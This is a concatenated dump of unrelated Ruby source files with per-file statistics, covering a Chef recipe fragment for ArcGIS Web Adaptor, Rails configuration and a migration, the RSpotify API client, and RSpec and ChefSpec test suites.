      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_105_154055.tar.gz')
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.4.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_1041_152000.tar.gz')
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.4'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_104_149448.tar.gz')
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    else
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    end

    web_adaptor['install_dir'] = '/'
    web_adaptor['install_subdir'] = "arcgis/webadaptor#{node['arcgis']['version']}"
  end

  web_adaptor['setup_options'] = ''

  # Starting from ArcGIS 10.8.1 Web Adaptor registration supports 'ReindexPortalContent' option.
  web_adaptor['reindex_portal_content'] = true
end
| 60.977401 | 120 | 0.585379 |
e8e46593376f7968b6f84c4cd7958f6db75c6121 | 1,424 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Pokeapi
  class Application < Rails::Application
    # Initialize configuration defaults for originally generated Rails version.
    config.load_defaults 5.2

    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration can go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded after loading
    # the framework and any gems in your application.

    # Only loads a smaller set of middleware suitable for API only apps.
    # Middleware like session, flash, cookies can be added back manually.
    # Skip views, helpers and assets when generating a new resource.
    config.api_only = true

    # Custom app settings: the Bulbapedia index page scraping starts from,
    # and the site root for resolving relative links. Presumably read
    # elsewhere via Rails.configuration.start_url / .base_url — confirm
    # at the call sites.
    config.start_url = "https://bulbapedia.bulbagarden.net/wiki/List_of_Pok%C3%A9mon_by_National_Pok%C3%A9dex_number"
    config.base_url = "https://bulbapedia.bulbagarden.net"
  end
end
| 36.512821 | 117 | 0.775281 |
bfbec6e2389a40446727eb09c98c6402c4f79c23 | 3,098 | require 'base64'
require 'json'
require 'restclient'
# Top-level module for the Spotify Web API client: holds endpoint
# constants, the module-wide client credentials/token, and generated
# HTTP helper methods.
module RSpotify

  API_URI = 'https://api.spotify.com/v1/'
  AUTHORIZE_URI = 'https://accounts.spotify.com/authorize'
  TOKEN_URI = 'https://accounts.spotify.com/api/token'
  # HTTP verbs for which request helpers are generated at the bottom of
  # this module.
  VERBS = %w(get post put delete)

  # Builds the HTTP Basic authorization header from the client id/secret
  # captured by .authenticate or .exchange_code.
  def self.auth_header
    authorization = Base64.strict_encode64 "#{@client_id}:#{@client_secret}"
    { 'Authorization' => "Basic #{authorization}" }
  end
  private_class_method :auth_header

  # Authenticates access to restricted data. Requires {https://developer.spotify.com/my-applications user credentials}
  #
  # @param client_id [String]
  # @param client_secret [String]
  #
  # @example
  #   RSpotify.authenticate("<your_client_id>", "<your_client_secret>")
  #
  #   playlist = RSpotify::Playlist.find('wizzler', '00wHcTN0zQiun4xri9pmvX')
  #   playlist.name #=> "Movie Soundtrack Masterpieces"
  def self.authenticate(client_id, client_secret)
    @client_id, @client_secret = client_id, client_secret
    request_body = { grant_type: 'client_credentials' }
    # Client-credentials flow: the token is stored module-wide and used by
    # the auth_* helpers defined below.
    response = RestClient.post(TOKEN_URI, request_body, auth_header)
    @client_token = JSON.parse(response)['access_token']
    true
  end

  # Exchanges the authorization code from the {https://developer.spotify.com/web-api/authorization-guide/#authorization_code_flow Authorization Code Flow} to access and refresh tokens
  #
  # @param code [String] The Spotify authorization code that can be exchanged for an access token.
  # @param redirect_uri [String] The URI Spotify redirected the user to after the permission grant
  # @param credentials [Hash] An optional set of credentials, unless RSpotify.authenticate was used previously
  #
  # @return [Hash] a set of credentials
  #
  # @example
  #   # Whenever Spotify redirects the user to our application after granting permissions, we get a GET param in the form of ?code=NApCCg(...)BkWtQ
  #   credentials = RSpotify.exchange_code(params['code'], 'http://foo.com/spotify/login')
  #   user = RSpotify::User.from_credentials(credentials)
  #   user.name #=> "John Doe"
  def self.exchange_code(code, redirect_uri, credentials={})
    @client_id = credentials['client_id'] if credentials['client_id']
    @client_secret = credentials['client_secret'] if credentials['client_secret']
    request_body = {
      grant_type: 'authorization_code',
      code: code,
      redirect_uri: redirect_uri,
      client_id: @client_id,
      client_secret: @client_secret
    }
    # NOTE(review): the header claims JSON but RestClient form-encodes a
    # Hash payload; this apparently works against the token endpoint —
    # confirm this mismatch is intended.
    response = RestClient.post(TOKEN_URI, request_body, {'Content-Type' => 'application/json'})
    return JSON.parse(response)
  end

  # For each verb, define RSpotify.get/post/put/delete (raw requests
  # against API_URI) plus RSpotify.auth_get/... variants that attach the
  # Bearer token obtained by .authenticate.
  VERBS.each do |verb|
    define_singleton_method verb do |path, *params|
      url = API_URI + path
      response = RestClient.send(verb, url, *params)
      # Some endpoints return an empty body; yield nil instead of raising
      # a JSON parse error.
      JSON.parse response unless response.empty?
    end

    define_singleton_method "auth_#{verb}" do |path, *params|
      auth_header = { 'Authorization' => "Bearer #{@client_token}" }
      params << auth_header
      send(verb, path, *params)
    end
  end
end
| 38.725 | 183 | 0.695933 |
283717b5a71ce7102734692b4f244e2da3c367c0 | 149 | # frozen_string_literal: true
# Reversible migration: adds a string `name` column to the partners table.
class AddNameToPartner < ActiveRecord::Migration[5.0]
  def change
    change_table :partners do |t|
      t.string :name
    end
  end
end
| 18.625 | 53 | 0.751678 |
21a06058079194299468a86f4b5b5c3197f6e48f | 2,557 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'spec_helper'
require 'rspec/rails'
require 'pundit/rspec'
require 'capybara/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migrations before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
  # Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
  config.fixture_path = "#{::Rails.root}/spec/fixtures"

  # If you're not using ActiveRecord, or you'd prefer not to run each of your
  # examples within a transaction, remove the following line or assign false
  # instead of true.
  config.use_transactional_fixtures = true

  # RSpec Rails can automatically mix in different behaviours to your tests
  # based on their file location, for example enabling you to call `get` and
  # `post` in specs under `spec/controllers`.
  #
  # You can disable this behaviour by removing the line below, and instead
  # explicitly tag your specs with their type, e.g.:
  #
  #     RSpec.describe UsersController, :type => :controller do
  #       # ...
  #     end
  #
  # The different available types are documented in the features, such as in
  # https://relishapp.com/rspec/rspec-rails/docs
  config.infer_spec_type_from_file_location!

  # Make Capybara's DSL (visit, page, ...) available in all example groups.
  config.include Capybara::DSL
end
| 44.086207 | 86 | 0.748925 |
1cacb5f0a2adaafbaad2cce04e724e782292e256 | 8,882 | # Copyright (c) 2018 Public Library of Science
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
require 'rails_helper'
describe Card do
# Shared subject for the outer examples: a card created with the
# :versioned factory trait (i.e. it already has a card version).
let(:card) do
  FactoryGirl.create(
    :card,
    :versioned
  )
end
context 'validation' do
  it 'is valid' do
    expect(card).to be_valid
  end

  # Name uniqueness is scoped to the journal: the same name is rejected
  # within one journal but allowed in a different journal.
  it 'enforces a unique name per journal' do
    journal_a = FactoryGirl.create(:journal)
    journal_b = FactoryGirl.create(:journal)
    FactoryGirl.create(:card, name: "Foo", journal: journal_a)
    new_invalid_card = FactoryGirl.build(:card, name: "Foo", journal: journal_a)
    expect(new_invalid_card).to_not be_valid
    expect(new_invalid_card.errors[:name]).to be_present
    new_valid_card = FactoryGirl.build(:card, name: "Foo", journal: journal_b)
    expect(new_valid_card).to be_valid
  end
end
# Card.create_published! builds a card whose first version is already
# published, with a fixed "loaded from config" history entry and a
# content root.
describe 'create_published!' do
  let(:new_card) { Card.create_published!(name: 'foo', card_task_type: FactoryGirl.create(:card_task_type)) }

  it 'creates a new card with the given attributes' do
    expect(new_card.name).to eq('foo')
  end

  it 'creates a new published card version' do
    latest_version = new_card.latest_card_version
    expect(latest_version).to be_published
    expect(latest_version).to eq(new_card.latest_published_card_version)
    expect(latest_version.history_entry).to eq("Loaded from a configuration file")
  end

  it 'gives the card version a piece of card content' do
    expect(new_card.latest_card_version.content_root).to be_present
  end
end
# #content_root_for_version accepts either a version number or :latest.
describe '#content_root_for_version' do
  it 'returns the root card content' do
    expect(card.content_root_for_version(1)).to be_present
  end

  it 'returns the root card content for the latest' do
    expect(card.content_root_for_version(:latest)).to be_present
  end
end
# #publish! stamps the latest (unpublished) version with published_at,
# records the required history entry, and optionally the publishing user.
describe "#publish!" do
  # Overrides the outer `card`: a card whose version 1 is NOT yet
  # published (published_at: nil), so publish! has something to stamp.
  let(:card) do
    FactoryGirl.create(
      :card,
      latest_version: 1
    )
  end
  let!(:card_version) do
    FactoryGirl.create(
      :card_version,
      card: card,
      version: 1,
      published_at: nil
    )
  end

  it "sets the published_at on the latest version if it's unset" do
    card.publish!("foo")
    expect(card_version.reload.published_at).to be_present
  end

  it "assigns the provided history_entry to the latest card version" do
    card.publish!("foo")
    expect(card_version.reload.history_entry).to eq("foo")
  end

  it "sets the published_by when provided" do
    user = FactoryGirl.create(:user)
    card.publish!("foo", user)
    expect(card_version.reload.published_by).to eq(user)
  end

  # The history entry argument is mandatory.
  it "blows up if not invoked with a new history entry" do
    expect { card.publish! }.to raise_error(ArgumentError)
  end
end
# .find_by_class_name resolves a namespaced class name to a card name via
# LookupClassNamespace and returns the matching card, or nil.
describe '.find_by_class_name' do
  let(:card) { FactoryGirl.create(:card, journal: nil) }
  let(:card_class_name) { "A::Sample::ClassName" }

  context 'with successful namespace lookup' do
    before do
      expect(LookupClassNamespace).to receive(:lookup_namespace)
        .with(card_class_name)
        .and_return(card.name)
    end

    it 'finds the card' do
      expect(Card.find_by_class_name(card_class_name)).to eq(card)
    end
  end

  context 'without successful namespace lookup' do
    it 'returns nil' do
      expect(Card.find_by_class_name(card_class_name)).to be_nil
    end
  end
end
# Bang variant: same lookup, but raises RecordNotFound (mentioning the
# class name) instead of returning nil.
describe '.find_by_class_name!' do
  let(:card) { FactoryGirl.create(:card, journal: nil) }
  let(:card_class_name) { "A::Sample::ClassName" }

  context 'with successful namespace lookup' do
    before do
      expect(LookupClassNamespace).to receive(:lookup_namespace)
        .with(card_class_name)
        .and_return(card.name)
    end

    it 'finds the card' do
      expect(Card.find_by_class_name!(card_class_name)).to eq(card)
    end
  end

  context 'without successful namespace lookup' do
    it 'raises an error' do
      expect do
        Card.find_by_class_name!(card_class_name)
      end.to raise_error(ActiveRecord::RecordNotFound, /#{card_class_name}/)
    end
  end
end
# Only draft cards may be destroyed; destroy on a locked card is refused
# (ActiveRecord returns false when a callback halts destruction).
describe "#destroy" do
  context "non-draft cards" do
    let(:card) { FactoryGirl.create(:card, :versioned, :locked) }
    it "does not destroy" do
      expect(card.destroy).to be_falsey
    end
  end

  context "draft cards" do
    let(:card) { FactoryGirl.create(:card, :versioned, :draft) }
    it "destroys" do
      expect(card.destroy).to be_truthy
    end
  end
end
context "a card with multiple versions" do
  # A card pointing at version 2, with explicit version-1 and version-2
  # records created eagerly (let!) so the queries below can see them.
  let(:card) do
    FactoryGirl.create(
      :card,
      latest_version: 2
    )
  end
  let!(:old_version) { FactoryGirl.create(:card_version, card: card, version: 1) }
  let!(:new_version) { FactoryGirl.create(:card_version, card: card, version: 2) }

  describe '#card_version' do
    it 'returns the card version with the specified number' do
      expect(card.card_version(1).version).to eq(1)
    end

    it 'returns the card version for the latest version' do
      expect(card.latest_card_version.version).to eq(2)
    end
  end

  # Counts below are 2 = content root + one added child.
  describe '#content_for_version' do
    it 'returns all card content for a given version' do
      old_version.content_root.children << FactoryGirl.create(:card_content)
      expect(card.content_for_version(1).count).to eq(2)
    end

    it 'returns all card content for the latest version' do
      new_version.content_root.children << FactoryGirl.create(:card_content)
      expect(card.content_for_version(:latest).count).to eq(2)
    end
  end

  # Same as above but the root itself is excluded, so only the child
  # remains and it must have a parent_id.
  describe '#content_for_version_without_root' do
    it 'returns all card content for a given version minus the root' do
      old_version.content_root.children << FactoryGirl.create(:card_content)
      expect(card.content_for_version_without_root(1).count).to eq(1)
      expect(card.content_for_version_without_root(1).first.parent_id).to be_present
    end

    it 'returns all card content for the latest version minus the root' do
      new_version.content_root.children << FactoryGirl.create(:card_content)
      expect(card.content_for_version_without_root(:latest).count).to eq(1)
      expect(card.content_for_version_without_root(:latest).first.parent_id).to be_present
    end
  end
end
# For now the real meat of the tests are with the XmlCardLoader
# #update_from_xml delegates to XmlCardLoader: published cards get a new
# draft version; draft (or published-with-changes) cards have their
# current draft replaced.
describe "#update_from_xml" do
  let(:card) do
    FactoryGirl.create(
      :card,
      :versioned
    )
  end

  context "the card is published" do
    it "has the XmlCardLoader make a new draft version" do
      allow(XmlCardLoader).to receive(:new_version_from_xml_string)
      expect(XmlCardLoader).to receive(:new_version_from_xml_string).with("foo", card)
      card.update_from_xml("foo")
    end
  end

  context "the card is a draft" do
    it "has the XmlCardLoader replace the current draft" do
      card.update(state: "draft")
      card.latest_card_version.update(published_at: nil)
      allow(XmlCardLoader).to receive(:replace_draft_from_xml_string)
      expect(XmlCardLoader).to receive(:replace_draft_from_xml_string).with("foo", card)
      card.update_from_xml("foo")
    end
  end

  context "the card is published with changes" do
    it "has the XmlCardLoader replace the current draft" do
      card.update(state: "published_with_changes")
      card.latest_card_version.update(published_at: nil)
      allow(XmlCardLoader).to receive(:replace_draft_from_xml_string)
      expect(XmlCardLoader).to receive(:replace_draft_from_xml_string).with("foo", card)
      card.update_from_xml("foo")
    end
  end
end
end
| 33.771863 | 111 | 0.680928 |
bfd28f7a676c75acf96c55f242d84cf0fe787220 | 4,183 |
#
# Copyright:: 2016 cloudbau GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require_relative '../libraries/openstack_endpoint'
describe 'openstackclient_test::endpoint' do
# Converges the test recipe with step_into so the custom
# openstack_endpoint resource's internals are executed and observable.
let(:chef_run) do
  runner = ChefSpec::SoloRunner.new(
    UBUNTU_OPTS.merge(step_into: ['openstack_endpoint'])
  )
  runner.converge(described_recipe)
end

# Fog services collection stub; every lookup resolves to service id 1.
let(:services_dub) do
  double :services,
         find: double(id: 1)
end

# Endpoints collection where no matching endpoint exists (find => nil).
let(:endpoints_empty) do
  double :endpoints,
         create: true,
         destroy: true,
         find: nil
end

# Endpoints collection where a matching endpoint (id 2) already exists.
let(:endpoints_populated) do
  double :endpoints,
         create: true,
         destroy: true,
         find: double(id: 2)
end
# With no pre-existing endpoints, the :create action must create one
# endpoint per interface and the :delete action must destroy nothing.
context 'no endpoints defined' do
  let(:connection_dub) do
    double :fog_connection,
           services: services_dub,
           endpoints: endpoints_empty
  end

  before do
    allow_any_instance_of(OpenstackclientCookbook::OpenstackEndpoint)
      .to receive(:connection).and_return(connection_dub)
  end

  it do
    expect(connection_dub).to receive(:endpoints)
    chef_run
  end

  it do
    expect(connection_dub).to receive(:services)
    chef_run
  end

  %w(public internal admin).each do |interface|
    it do
      expect(chef_run).to write_log(
        "#{interface}_endpoint for \"myservice\" doesn't exist"
      )
    end

    it do
      expect(chef_run).not_to write_log(
        "#{interface}_endpoint for \"myservice\" already exists"
      )
    end

    it do
      expect(chef_run).to create_openstack_endpoint("myendpoint_#{interface}")
    end

    it do
      expect(chef_run).to delete_openstack_endpoint("myendpoint_#{interface}")
    end

    # Creation must pass the resolved service id and the per-interface URL.
    it do
      expect(endpoints_empty).to receive(:create)
        .with(
          interface: interface,
          url: "http://localhost:80/#{interface}",
          service_id: 1,
          name: "myendpoint_#{interface}",
          region: nil
        )
      chef_run
    end

    it do
      expect(endpoints_empty).not_to receive(:destroy)
      chef_run
    end
  end
end
# With endpoints already present, :create must be a no-op and :delete
# must destroy the existing endpoint (id 2).
context 'endpoints defined' do
  let(:connection_dub) do
    double :fog_connection,
           services: services_dub,
           endpoints: endpoints_populated
  end

  before do
    allow_any_instance_of(OpenstackclientCookbook::OpenstackEndpoint)
      .to receive(:connection).and_return(connection_dub)
  end

  it do
    expect(connection_dub).to receive(:endpoints)
    chef_run
  end

  it do
    expect(connection_dub).to receive(:services)
    chef_run
  end

  %w(public internal admin).each do |interface|
    it do
      expect(chef_run).not_to write_log(
        "#{interface}_endpoint for \"myservice\" doesn't exist"
      )
    end

    it do
      expect(chef_run).to write_log(
        "#{interface}_endpoint for \"myservice\" already exists"
      )
    end

    it do
      expect(chef_run).to create_openstack_endpoint("myendpoint_#{interface}")
    end

    it do
      expect(chef_run).to delete_openstack_endpoint("myendpoint_#{interface}")
    end

    it do
      expect(endpoints_populated).not_to receive(:create)
        .with(
          interface: interface,
          url: "http://localhost:80/#{interface}",
          service_id: 1,
          name: "myendpoint_#{interface}",
          region: nil
        )
      chef_run
    end

    it do
      expect(endpoints_populated).to receive(:destroy)
        .with(2)
      chef_run
    end
  end
end
end
| 24.89881 | 80 | 0.618456 |
2896e1f2b6a87d30973d06007f7e4b2593fdb054 | 2,129 | #
# base.rb
# Copyright © 2019 Netguru S.A. All rights reserved.
#
module Highway
module Compiler
module Analyze
module Tree
module Values
# This class is a base abstract class for other classes in this
# module. You should not use it directly.
class Base

  public

  # Abstract: value objects are never instantiated through this base
  # class; subclasses must provide their own initializer.
  def initialize()
    raise NotImplementedError.new("You must not call `#{__method__.to_s}` on `#{self.class.to_s}`.")
  end

  # A flat array of all segments. Abstract — subclasses must override.
  #
  # @return [Array<Highway::Compiler::Analyze::Tree::Segments::*>]
  def flatten_segments
    raise NotImplementedError.new("You must override `#{__method__.to_s}` in `#{self.class.to_s}`.")
  end

  # A flat array of all segments which satisfy the given block.
  #
  # @param &block [Block] The selection block.
  #
  # @return [Array<Highway::Compiler::Analyze::Tree::Segments::*>]
  def select_segments(&block)
    flatten_segments.select(&block)
  end

  # The flat array of variable segments which satisfy the given block.
  # When no block is given, all variable segments are returned.
  #
  # @param &block [Block] The selection block.
  #
  # @return [Array<Highway::Compiler::Analyze::Tree::Segments::Variable>]
  def select_variable_segments(&block)
    if block_given?
      select_segments { |s| s.is_a?(Segments::Variable) && block.call(s) }
    else
      select_segments { |s| s.is_a?(Segments::Variable) }
    end
  end

  # The flat array of variable segments with the given scope.
  #
  # @param scope [Symbol] The lookup scope.
  #
  # @return [Array<Highway::Compiler::Analyze::Tree::Segments::Variable>]
  def select_variable_segments_with_scope(scope)
    select_variable_segments { |s| s.scope == scope }
  end

end
end
end
end
end
end
| 31.308824 | 110 | 0.543448 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.